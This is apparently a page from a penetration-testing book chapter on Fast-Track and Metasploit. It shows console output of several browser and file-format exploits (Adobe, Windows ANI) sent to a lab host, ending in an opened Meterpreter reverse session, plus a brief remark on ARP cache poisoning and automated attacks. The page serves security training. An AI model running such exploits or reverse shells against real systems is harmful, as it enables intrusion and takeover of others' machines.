background image

176

Chapter 11

NOTE

You could use ARP cache poisoning within this attack, but it will only work when you 
are on the same local and unrestricted subnet as the target.

[*] Local IP: http://10.211.55.130:8071/
[*] Server started.
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8072/
[*] Local IP: http://10.211.55.130:8072/
[*] Server started.
msf exploit(zenturiprogramchecker_unsafe) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8073/
[*] Local IP: http://10.211.55.130:8073/
[*] Server started.

 [*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044...

[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 10.211.55.128:1047...
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046...
[*] Sending exploit to 10.211.55.128:1049...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 

10.211.55.128:1076...

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)

 [*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077

msf exploit(zenturiprogramchecker_unsafe) > sessions -l

Active sessions
===============

Id Description Tunnel 
-- ----------- ------ 
1 Meterpreter 10.211.55.130:9007 -> 10.211.55.128:1077 

msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

A Few Words About Automation

Fast-Track offers a plethora of exploitation capabilities that expand upon the 
feature-rich Metasploit Framework. When coupled with Metasploit it will allow 
you to use advanced attack vectors to fully control a target machine. Of 
course, automated attack vectors do not always succeed, which is why you 
must understand the system you are performing the attack against and 
ensure that when you attack it, you know its chances of success. If an auto-
mated tool fails, your ability to perform the tests manually and successfully 
attack the target system will make you a better penetration tester.